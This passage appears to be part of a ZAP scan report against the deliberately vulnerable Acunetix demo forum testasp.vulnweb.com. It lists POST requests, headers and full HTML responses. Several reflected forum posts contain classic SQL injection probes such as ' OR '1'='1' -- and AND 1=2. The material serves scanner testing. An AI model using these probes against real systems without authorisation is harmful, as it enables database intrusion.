class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=11 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=11 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:38 GMT Content-Length: 3069 |
| Response Body - size: 3,069 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1 -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=12 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=12 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:38 GMT Content-Length: 3070 |
| Response Body - size: 3,070 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2 -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=13 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=13 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:38 GMT Content-Length: 3074 |
| Response Body - size: 3,074 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1' -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=14 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=14 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:38 GMT Content-Length: 3075 |
| Response Body - size: 3,075 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2' -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=15 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=15 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=15 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:39 GMT Content-Length: 3074 |
| Response Body - size: 3,074 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1" -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=16 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=16 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:39 GMT Content-Length: 3075 |
| Response Body - size: 3,075 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2" -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=17 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=17 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:39 GMT Content-Length: 3065 |
| Response Body - size: 3,065 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=18 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=18 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:40 GMT Content-Length: 3066 |
| Response Body - size: 3,066 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=19 |
